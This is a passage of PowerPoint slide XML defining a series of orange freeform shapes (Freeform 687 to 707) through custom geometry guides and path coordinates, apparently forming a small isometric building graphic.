                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3375" y="1879"/>
                  <a:ext cx="20" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 38 h 76"/>
                    <a:gd name="T2" fmla="*/ 0 w 140"/>
                    <a:gd name="T3" fmla="*/ 0 h 76"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 76 h 76"/>
                    <a:gd name="T6" fmla="*/ 140 w 140"/>
                    <a:gd name="T7" fmla="*/ 38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0" h="76">
                      <a:moveTo>
                        <a:pt x="140" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14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1B171B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Freeform 687"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3421" y="1700"/>
                  <a:ext cx="289" cy="310"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1993"/>
                    <a:gd name="T1" fmla="*/ 1601 h 2138"/>
                    <a:gd name="T2" fmla="*/ 0 w 1993"/>
                    <a:gd name="T3" fmla="*/ 0 h 2138"/>
                    <a:gd name="T4" fmla="*/ 1993 w 1993"/>
                    <a:gd name="T5" fmla="*/ 536 h 2138"/>
                    <a:gd name="T6" fmla="*/ 1993 w 1993"/>
                    <a:gd name="T7" fmla="*/ 2138 h 2138"/>
                    <a:gd name="T8" fmla="*/ 0 w 1993"/>
                    <a:gd name="T9" fmla="*/ 1601 h 21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93" h="2138">
                      <a:moveTo>
                        <a:pt x="0" y="1601"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1993" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1993" y="2138"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1601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8" name="Freeform 688"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2993" y="1889"/>
                  <a:ext cx="245" cy="236"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 770 w 1699"/>
                    <a:gd name="T1" fmla="*/ 1377 h 1625"/>
                    <a:gd name="T2" fmla="*/ 770 w 1699"/>
                    <a:gd name="T3" fmla="*/ 406 h 1625"/>
                    <a:gd name="T4" fmla="*/ 19 w 1699"/>
                    <a:gd name="T5" fmla="*/ 203 h 1625"/>
                    <a:gd name="T6" fmla="*/ 19 w 1699"/>
                    <a:gd name="T7" fmla="*/ 1176 h 1625"/>
                    <a:gd name="T8" fmla="*/ 0 w 1699"/>
                    <a:gd name="T9" fmla="*/ 1169 h 1625"/>
                    <a:gd name="T10" fmla="*/ 0 w 1699"/>
                    <a:gd name="T11" fmla="*/ 0 h 1625"/>
                    <a:gd name="T12" fmla="*/ 1699 w 1699"/>
                    <a:gd name="T13" fmla="*/ 456 h 1625"/>
                    <a:gd name="T14" fmla="*/ 1699 w 1699"/>
                    <a:gd name="T15" fmla="*/ 1625 h 1625"/>
                    <a:gd name="T16" fmla="*/ 770 w 1699"/>
                    <a:gd name="T17" fmla="*/ 1377 h 1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699" h="1625">
                      <a:moveTo>
                        <a:pt x="770" y="1377"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="770" y="406"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="203"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="1176"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1699" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1699" y="1625"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="770" y="1377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Freeform 689"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2995" y="2029"/>
                  <a:ext cx="109" cy="60"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 751"/>
                    <a:gd name="T1" fmla="*/ 215 h 416"/>
                    <a:gd name="T2" fmla="*/ 0 w 751"/>
                    <a:gd name="T3" fmla="*/ 203 h 416"/>
                    <a:gd name="T4" fmla="*/ 751 w 751"/>
                    <a:gd name="T5" fmla="*/ 0 h 416"/>
                    <a:gd name="T6" fmla="*/ 751 w 751"/>
                    <a:gd name="T7" fmla="*/ 416 h 416"/>
                    <a:gd name="T8" fmla="*/ 0 w 751"/>
                    <a:gd name="T9" fmla="*/ 215 h 4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51" h="416">
                      <a:moveTo>
                        <a:pt x="0" y="215"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="203"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="751" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="751" y="416"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="215"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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690"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3400" y="1700"/>
                  <a:ext cx="310" cy="84"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1993 w 2142"/>
                    <a:gd name="T1" fmla="*/ 576 h 576"/>
                    <a:gd name="T2" fmla="*/ 2142 w 2142"/>
                    <a:gd name="T3" fmla="*/ 536 h 576"/>
                    <a:gd name="T4" fmla="*/ 149 w 2142"/>
                    <a:gd name="T5" fmla="*/ 0 h 576"/>
                    <a:gd name="T6" fmla="*/ 0 w 2142"/>
                    <a:gd name="T7" fmla="*/ 40 h 576"/>
                    <a:gd name="T8" fmla="*/ 1993 w 2142"/>
                    <a:gd name="T9" fmla="*/ 576 h 5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42" h="576">
                      <a:moveTo>
                        <a:pt x="1993" y="576"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2142" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="149" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="40"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1993" y="576"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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691"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2993" y="1883"/>
                  <a:ext cx="267" cy="73"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1699 w 1848"/>
                    <a:gd name="T1" fmla="*/ 496 h 496"/>
                    <a:gd name="T2" fmla="*/ 1848 w 1848"/>
                    <a:gd name="T3" fmla="*/ 456 h 496"/>
                    <a:gd name="T4" fmla="*/ 149 w 1848"/>
                    <a:gd name="T5" fmla="*/ 0 h 496"/>
                    <a:gd name="T6" fmla="*/ 0 w 1848"/>
                    <a:gd name="T7" fmla="*/ 40 h 496"/>
                    <a:gd name="T8" fmla="*/ 1699 w 1848"/>
                    <a:gd name="T9" fmla="*/ 496 h 4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48" h="496">
                      <a:moveTo>
                        <a:pt x="1699" y="496"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1848" y="456"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="149" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="40"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1699" y="496"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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692"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2971" y="1821"/>
                  <a:ext cx="22" cy="238"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 146"/>
                    <a:gd name="T1" fmla="*/ 1599 h 1639"/>
                    <a:gd name="T2" fmla="*/ 146 w 146"/>
                    <a:gd name="T3" fmla="*/ 1639 h 1639"/>
                    <a:gd name="T4" fmla="*/ 146 w 146"/>
                    <a:gd name="T5" fmla="*/ 37 h 1639"/>
                    <a:gd name="T6" fmla="*/ 0 w 146"/>
                    <a:gd name="T7" fmla="*/ 0 h 1639"/>
                    <a:gd name="T8" fmla="*/ 0 w 146"/>
                    <a:gd name="T9" fmla="*/ 1599 h 16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6" h="1639">
                      <a:moveTo>
                        <a:pt x="0" y="1599"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="146" y="1639"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="146" y="37"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1599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Freeform 693"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3260" y="1777"/>
                  <a:ext cx="450" cy="354"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3101"/>
                    <a:gd name="T1" fmla="*/ 2433 h 2433"/>
                    <a:gd name="T2" fmla="*/ 0 w 3101"/>
                    <a:gd name="T3" fmla="*/ 832 h 2433"/>
                    <a:gd name="T4" fmla="*/ 3101 w 3101"/>
                    <a:gd name="T5" fmla="*/ 0 h 2433"/>
                    <a:gd name="T6" fmla="*/ 3101 w 3101"/>
                    <a:gd name="T7" fmla="*/ 1602 h 2433"/>
                    <a:gd name="T8" fmla="*/ 0 w 3101"/>
                    <a:gd name="T9" fmla="*/ 2433 h 2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01" h="2433">
                      <a:moveTo>
                        <a:pt x="0" y="2433"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="832"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3101" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3101" y="1602"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2433"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF6B21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Freeform 694"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3586" y="1910"/>
                  <a:ext cx="30" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 203 w 203"/>
                    <a:gd name="T1" fmla="*/ 0 h 564"/>
                    <a:gd name="T2" fmla="*/ 203 w 203"/>
                    <a:gd name="T3" fmla="*/ 508 h 564"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 564 h 564"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 54 h 564"/>
                    <a:gd name="T8" fmla="*/ 203 w 203"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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3" h="564">
                      <a:moveTo>
                        <a:pt x="203" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="203" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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Freeform 695"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3591" y="1916"/>
                  <a:ext cx="20" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 139 w 139"/>
                    <a:gd name="T3" fmla="*/ 452 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 139"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 139 w 139"/>
                    <a:gd name="T9" fmla="*/ 0 h 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9" h="489">
                      <a:moveTo>
                        <a:pt x="139" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="139" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="0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Freeform 696"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3630" y="1899"/>
                  <a:ext cx="30" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 205 w 205"/>
                    <a:gd name="T1" fmla="*/ 0 h 565"/>
                    <a:gd name="T2" fmla="*/ 205 w 205"/>
                    <a:gd name="T3" fmla="*/ 510 h 565"/>
                    <a:gd name="T4" fmla="*/ 0 w 205"/>
                    <a:gd name="T5" fmla="*/ 565 h 565"/>
                    <a:gd name="T6" fmla="*/ 0 w 205"/>
                    <a:gd name="T7" fmla="*/ 57 h 565"/>
                    <a:gd name="T8" fmla="*/ 205 w 205"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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5" h="565">
                      <a:moveTo>
                        <a:pt x="205" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="205" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="565"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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697"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3635" y="1905"/>
                  <a:ext cx="20" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 139 w 139"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 139"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 139 w 139"/>
                    <a:gd name="T9" fmla="*/ 0 h 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9" h="489">
                      <a:moveTo>
                        <a:pt x="139" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="139" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="0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698"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3497" y="1935"/>
                  <a:ext cx="30" cy="81"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 203 w 203"/>
                    <a:gd name="T1" fmla="*/ 0 h 562"/>
                    <a:gd name="T2" fmla="*/ 203 w 203"/>
                    <a:gd name="T3" fmla="*/ 508 h 562"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 562 h 562"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 54 h 562"/>
                    <a:gd name="T8" fmla="*/ 203 w 203"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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3" h="562">
                      <a:moveTo>
                        <a:pt x="203" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="203" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="562"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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699"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3502" y="1940"/>
                  <a:ext cx="20" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 139 w 139"/>
                    <a:gd name="T3" fmla="*/ 454 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 139"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 139 w 139"/>
                    <a:gd name="T9" fmla="*/ 0 h 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9" h="489">
                      <a:moveTo>
                        <a:pt x="139" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="139" y="454"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="0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700"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3542" y="1923"/>
                  <a:ext cx="29" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 206 w 206"/>
                    <a:gd name="T1" fmla="*/ 0 h 563"/>
                    <a:gd name="T2" fmla="*/ 206 w 206"/>
                    <a:gd name="T3" fmla="*/ 508 h 563"/>
                    <a:gd name="T4" fmla="*/ 0 w 206"/>
                    <a:gd name="T5" fmla="*/ 563 h 563"/>
                    <a:gd name="T6" fmla="*/ 0 w 206"/>
                    <a:gd name="T7" fmla="*/ 55 h 563"/>
                    <a:gd name="T8" fmla="*/ 206 w 206"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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6" h="563">
                      <a:moveTo>
                        <a:pt x="206" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="206" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="563"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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Freeform 701"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3546" y="1929"/>
                  <a:ext cx="21" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 139 w 139"/>
                    <a:gd name="T1" fmla="*/ 0 h 491"/>
                    <a:gd name="T2" fmla="*/ 139 w 139"/>
                    <a:gd name="T3" fmla="*/ 453 h 491"/>
                    <a:gd name="T4" fmla="*/ 0 w 139"/>
                    <a:gd name="T5" fmla="*/ 491 h 491"/>
                    <a:gd name="T6" fmla="*/ 0 w 139"/>
                    <a:gd name="T7" fmla="*/ 38 h 491"/>
                    <a:gd name="T8" fmla="*/ 139 w 139"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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9" h="491">
                      <a:moveTo>
                        <a:pt x="139" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="139" y="453"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="491"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="139" y="0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2" name="Freeform 702"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3409" y="1958"/>
                  <a:ext cx="29" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 204 w 204"/>
                    <a:gd name="T1" fmla="*/ 0 h 565"/>
                    <a:gd name="T2" fmla="*/ 204 w 204"/>
                    <a:gd name="T3" fmla="*/ 508 h 565"/>
                    <a:gd name="T4" fmla="*/ 0 w 204"/>
                    <a:gd name="T5" fmla="*/ 565 h 565"/>
                    <a:gd name="T6" fmla="*/ 0 w 204"/>
                    <a:gd name="T7" fmla="*/ 54 h 565"/>
                    <a:gd name="T8" fmla="*/ 204 w 204"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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4" h="565">
                      <a:moveTo>
                        <a:pt x="204" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="204" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="565"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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Freeform 703"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3413" y="1964"/>
                  <a:ext cx="21" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 35 h 489"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 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0" h="489">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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704"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3453" y="1947"/>
                  <a:ext cx="30" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 206 w 206"/>
                    <a:gd name="T1" fmla="*/ 0 h 565"/>
                    <a:gd name="T2" fmla="*/ 206 w 206"/>
                    <a:gd name="T3" fmla="*/ 511 h 565"/>
                    <a:gd name="T4" fmla="*/ 0 w 206"/>
                    <a:gd name="T5" fmla="*/ 565 h 565"/>
                    <a:gd name="T6" fmla="*/ 0 w 206"/>
                    <a:gd name="T7" fmla="*/ 57 h 565"/>
                    <a:gd name="T8" fmla="*/ 206 w 206"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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6" h="565">
                      <a:moveTo>
                        <a:pt x="206" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="206" y="511"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="565"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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705"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3458" y="1952"/>
                  <a:ext cx="20" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 451 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 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0" h="489">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="140" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140" y="0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706"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3320" y="1982"/>
                  <a:ext cx="30" cy="82"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 203 w 203"/>
                    <a:gd name="T1" fmla="*/ 0 h 563"/>
                    <a:gd name="T2" fmla="*/ 203 w 203"/>
                    <a:gd name="T3" fmla="*/ 508 h 563"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 563 h 563"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 55 h 563"/>
                    <a:gd name="T8" fmla="*/ 203 w 203"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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3" h="563">
                      <a:moveTo>
                        <a:pt x="203" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="203" y="508"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="563"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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FF6B21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707"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3325" y="1988"/>
                  <a:ext cx="20" cy="70"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 140 w 140"/>
                    <a:gd name="T1" fmla="*/ 0 h 489"/>
                    <a:gd name="T2" fmla="*/ 140 w 140"/>
                    <a:gd name="T3" fmla="*/ 453 h 489"/>
                    <a:gd name="T4" fmla="*/ 0 w 140"/>
                    <a:gd name="T5" fmla="*/ 489 h 489"/>
                    <a:gd name="T6" fmla="*/ 0 w 140"/>
                    <a:gd name="T7" fmla="*/ 38 h 489"/>
                    <a:gd name="T8" fmla="*/ 140 w 140"/>
                    <a:gd name="T9" fmla="*/ 0 h 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0" h="489">
                      <a:moveTo>
                        <a:pt x="140" y="0"/>
                      </a:moveTo>
